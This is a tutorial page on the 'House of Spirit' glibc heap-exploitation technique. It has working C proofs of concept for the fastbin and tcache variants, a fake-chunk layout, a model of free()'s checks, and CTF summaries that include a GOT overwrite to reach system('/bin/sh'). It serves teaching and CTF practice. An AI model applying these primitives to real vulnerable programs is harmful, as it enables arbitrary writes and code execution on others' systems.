# House of Spirit


## Basic Information

### Code

<details>
<summary>House of Spirit</summary>

```c
#include <stdio.h>
#include <stdlib.h>

// Code altered to add some prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
  size_t prev_size;
  size_t size;
  struct fast_chunk *fd;
  struct fast_chunk *bk;
  char buf[0x20];               // chunk falls in fastbin size range
};

int main() {
  // Two chunks in consecutive memory; 16-byte aligned so modern glibc does
  // not reject the fake chunk with "free(): invalid pointer"
  struct fast_chunk fake_chunks[2] __attribute__((aligned(16)));
  void *ptr, *victim;

  ptr = malloc(0x30);

  printf("Original alloc address: %p\n", ptr);
  printf("Main fake chunk:%p\n", (void *)&fake_chunks[0]);
  printf("Second fake chunk for size: %p\n", (void *)&fake_chunks[1]);

  // Passes size check of "free(): invalid size"
  fake_chunks[0].size = sizeof(struct fast_chunk);

  // Passes "free(): invalid next size (fast)"
  fake_chunks[1].size = sizeof(struct fast_chunk);

  // Attacker overwrites a pointer that is about to be 'freed'
  // Point to .fd as it's the start of the content of the chunk
  ptr = (void *)&fake_chunks[0].fd;

  free(ptr);

  victim = malloc(0x30);
  printf("Victim: %p\n", victim);

  return 0;
}
```

</details>

### Goal

- Be able to add an address into the tcache / fast bin so that it can later be allocated

### Requirements

- This attack requires the attacker to be able to create two fake fast chunks that carry correct size values, and then to free the first fake chunk so that it enters the bin.
- With **tcache (glibc ≥2.26)** the attack is simpler: only one fake chunk is needed (no next-chunk size check is performed on the tcache path) as long as the fake chunk is 0x10-aligned and its size field falls within a valid tcache bin (0x20-0x410 on x64).

### Attack

- Create fake chunks that pass the security checks: you will need 2 fake chunks that place the correct sizes at the correct positions
- Somehow manage to free the first fake chunk so that it enters the fast or tcache bin, then allocate it to overwrite that address

**The code from** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **is great to understand the attack.** This schema from the code summarises it well:

<details>
<summary>Fake chunk layout</summary>

```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/
```

</details>

> **Tip:** Note that the second chunk is required in order to pass some of the sanity checks.

### Tcache house of spirit (glibc ≥2.26)

- In modern glibc, the tcache fast path calls `tcache_put` before validating the next chunk's size / `prev_inuse`, so only the fake chunk itself has to look sane.
- Requirements:
  - The fake chunk must be 16-byte aligned and must not have the `IS_MMAPPED`/`NON_MAIN_ARENA` flags set.
  - `size` must fall in a tcache bin and include the `prev_inuse` bit set (`size | 1`).
  - The tcache bin for that size must not be full (default max 7 entries).
- Minimal PoC (stack chunk):

```c
#include <stdlib.h>

int main(void) {
    unsigned long long fake[8] __attribute__((aligned(0x10))); // 0x40 bytes: whole fake chunk lies inside the array
    // chunk header at fake[0]; usable data starts at fake+2
    fake[1] = 0x41;              // fake size (0x40 bin, prev_inuse=1)
    void *p = &fake[2];          // points inside fake chunk
    free(p);                     // goes straight into tcache
    void *q = malloc(0x30);      // returns stack address fake+2
    return q == p ? 0 : 1;       // exit 0 when malloc handed back the stack address
}
```

- Safe-linking is not an obstacle here: the forward pointer stored in the tcache is mangled automatically as `fd = ptr ^ (heap_base >> 12)` at free time, so the attacker does not need to know the key when using a single fake chunk.
- This variant is useful when the glibc hooks have been removed (≥2.34) and you want a fast arbitrary write, or to overlap a target buffer (e.g. stack/BSS) with a tcache chunk without causing further corruption.
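To see which of these checks a bogus `free()` trips, and why the fastbin path needs the second fake header while the tcache path does not, here is an added example (not code from the page, from guyinatuxedo or from glibc): a user-space model of `free()`'s sanity checks for small chunks with x86-64 glibc defaults, run over a constructed byte array laid out like the diagram above. The `system_mem` value, the tcache fill level and the scenario numbering are assumptions of the model, and the tcache double-free key check is left out.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Added model (not page or glibc code) of the checks glibc >= 2.26 free()
 * applies to a small chunk on x86-64, in the order _int_free runs them.
 * Constants are x86-64 defaults; system_mem and the tcache fill level are
 * inputs chosen for the scenarios below. The double-free key check is omitted. */
#define SIZE_SZ         8UL
#define MALLOC_ALIGN    16UL
#define MINSIZE         32UL    /* smallest chunk on x86-64 */
#define MAX_FAST        0x80UL  /* default global_max_fast on x86-64 */
#define MAX_TCACHE      0x410UL /* largest tcache-able chunk size on x86-64 */
#define TCACHE_COUNT    7       /* default entries per tcache bin */
#define PREV_INUSE      1UL
#define IS_MMAPPED      2UL
#define NON_MAIN_ARENA  4UL
#define SIZE_BITS       (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

enum free_verdict {
    FREE_OK_TCACHE,         /* stored by the tcache path; next chunk never inspected */
    FREE_OK_FASTBIN,        /* stored by the fastbin path after the next-size check */
    FREE_INVALID_POINTER,   /* "free(): invalid pointer" */
    FREE_INVALID_SIZE,      /* "free(): invalid size" */
    FREE_INVALID_NEXT_SIZE, /* "free(): invalid next size (fast)" */
    FREE_NOT_MODELLED       /* mmapped, non-main-arena or large chunks: other paths */
};

struct model_state {
    size_t system_mem;  /* av->system_mem: upper bound on a plausible next size */
    int tcache_fill;    /* entries already in the tcache bin for this size */
};

static size_t read_size(const uint8_t *chunk) {
    size_t s;
    memcpy(&s, chunk + SIZE_SZ, sizeof s);  /* size field sits at chunk+8 */
    return s;
}

/* What free(user_ptr) would do with the header 16 bytes before user_ptr. */
enum free_verdict model_free(const void *user_ptr, const struct model_state *st)
{
    const uint8_t *chunk = (const uint8_t *)user_ptr - 2 * SIZE_SZ;
    size_t raw = read_size(chunk);
    size_t size = raw & ~SIZE_BITS;

    if (raw & (IS_MMAPPED | NON_MAIN_ARENA))  /* __libc_free: munmap / other arena */
        return FREE_NOT_MODELLED;
    /* _int_free prologue: the chunk itself must be aligned with a sane size. */
    if ((uintptr_t)chunk % MALLOC_ALIGN != 0)
        return FREE_INVALID_POINTER;
    if (size < MINSIZE || size % MALLOC_ALIGN != 0)
        return FREE_INVALID_SIZE;
    /* tcache path: size in range and bin not full -> stored immediately. */
    if (size <= MAX_TCACHE && st->tcache_fill < TCACHE_COUNT)
        return FREE_OK_TCACHE;
    /* fastbin path: only now is the header at chunk + size examined, which is
     * why the classic attack needs a second fake chunk right after the first. */
    if (size <= MAX_FAST) {
        size_t next_raw = read_size(chunk + size);
        if (next_raw <= 2 * SIZE_SZ || (next_raw & ~SIZE_BITS) >= st->system_mem)
            return FREE_INVALID_NEXT_SIZE;
        return FREE_OK_FASTBIN;
    }
    return FREE_NOT_MODELLED;
}

/* Constructed memory mirroring the diagram: chunk 0 with size field size0,
 * directly followed by chunk 1 whose size field is size1. */
static uint8_t layout[0x600] __attribute__((aligned(16)));

static void build_layout(size_t size0, size_t size1) {
    memset(layout, 0, sizeof layout);
    memcpy(layout + SIZE_SZ, &size0, sizeof size0);
    memcpy(layout + size0 + SIZE_SZ, &size1, sizeof size1);
}

/* Scenarios from the text; each returns the verdict free() would reach. */
enum free_verdict scenario(int which) {
    struct model_state bin_empty = { 0x21000, 0 };  /* assumed system_mem */
    struct model_state bin_full = { 0x21000, TCACHE_COUNT };
    const uint8_t *user = layout + 2 * SIZE_SZ;
    build_layout(0x60, 0x40);
    switch (which) {
    case 0:  return model_free(user, &bin_empty);      /* tcache: one fake chunk suffices */
    case 1:  return model_free(user, &bin_full);       /* fastbin: second header validated */
    case 2:  build_layout(0x60, 0);                     /* second header missing */
             return model_free(user, &bin_full);
    case 3:  return model_free(user + 8, &bin_empty);  /* misaligned pointer */
    default: build_layout(0x500, 0x40);                 /* too large for tcache and fastbin */
             return model_free(user, &bin_empty);
    }
}

int main(void) {
    printf("tcache=%d fastbin=%d missing_next=%d\n", scenario(0), scenario(1), scenario(2));
    return 0;
}
```

Scenarios 0 and 1 are the whole difference the text draws between the two variants: the same two-header layout is accepted on both paths, but dropping the second header (scenario 2) only breaks the fastbin one, because the tcache path stores the chunk before ever reading `chunk + size`. When triaging a crash, the string in the abort message maps straight back to the check that fired, which is what the enum names preserve.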

## Examples

- CTF [https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html](https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html)
  - **Libc infoleak**: Via an overflow it is possible to change a pointer to point to a GOT address in order to leak a libc address through the CTF's read action
  - **House of Spirit**: Abusing a counter that counts the number of "rifles" it is possible to forge a fake size for the first fake chunk; then, abusing the "message", it is possible to fake the size of the second chunk; and finally, abusing the overflow, it is possible to change the pointer that is going to be freed so that our first fake chunk is freed. Then we can allocate it, and inside it there will be the address of where "message" is stored. Then it is possible to make this point to the `scanf` entry in the GOT table, so we can overwrite it with the address of `system`. The next time `scanf` is called, we can send the input "/bin/sh" and get a shell.
- Gloater. HTB Cyber Apocalypse CTF 2024
  - **Glibc leak**: Uninitialized stack buffer.
  - **House of Spirit**: We can modify the first index of a global array of heap pointers. With a single-byte modification, we use `free` on a fake chunk inside a valid chunk, so that we get overlapping chunks after allocating again. With that, a simple Tcache poisoning attack works to obtain an arbitrary write primitive.
